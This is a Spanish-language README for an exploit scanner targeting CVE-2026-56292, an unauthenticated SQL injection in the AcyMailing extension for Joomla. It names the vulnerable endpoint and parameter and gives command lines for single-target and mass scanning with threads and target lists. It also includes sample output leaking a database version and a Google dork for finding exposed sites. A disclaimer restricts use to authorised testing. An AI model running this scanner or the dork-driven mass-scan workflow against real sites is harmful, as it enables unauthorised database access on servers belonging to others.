
CVE-2026-56292 - Escáner de inyección SQL no autenticada en AcyMailing para Joomla
Autor: nullwhisper
Solo para investigación de seguridad autorizada / validación de vulnerabilidades.
AcyMailing para Joomla expone la tarea pública de front-end frontentityselect::loadEntityFront. En versiones antiguas, el parámetro columns se pasa directamente a una consulta SQL sin saneamiento. Las versiones parcheadas usan acym_secureDBColumn() y devuelven un error como ... not secured.
index.php?option=com_acym&ctrl=frontentityselect&task=loadEntityFrontcolumns.
├── cve_2026_56292_acymailing_sqli.py # escáner individual + masivo
├── dorks.txt # google dorks
├── TECHNICAL.md # informe técnico
├── requirements.txt
├── LICENSE
└── README.md
pip3 install -r requirements.txt
Objetivo individual:
python3 cve_2026_56292_acymailing_sqli.py -u http://target/
Escaneo masivo:
python3 cve_2026_56292_acymailing_sqli.py -l targets.txt -v -T 30 -o vuln.txt
Opciones:
-u URL objetivo individual
-l LIST archivo de lista de objetivos
-t TIMEOUT tiempo de espera de la solicitud (por defecto 30)
-T THREADS hilos concurrentes (por defecto 10)
-o OUTPUT archivo de salida para objetivos vulnerables
-v verboso
--proxy PROXY proxy http/https
--patched-output FILE
--error-output FILE
Probado contra una instalación de AcyMailing v11.0.3 en un laboratorio local de Joomla 5 (modo de simulación vulnerable).
[*] Loaded 1 unique target(s)
[1/1] [+] VULNERABLE: http://127.0.0.1:8080/ -> version=10.11.18-MariaDB-ubu2204
[*] Done. Vulnerable: 1 | Patched: 0 | Error/Other: 0 | Total: 1
Ver dorks.txt. Dork principal:
inurl:"index.php?option=com_acym"
Esta herramienta es solo para pruebas de seguridad autorizadas e investigación. No la utilices contra sistemas que no poseas o para los que no tengas permiso escrito explícito para probar. El autor (nullwhisper) no es responsable del mal uso o daños causados por este código.
MIT — ver LICENSE.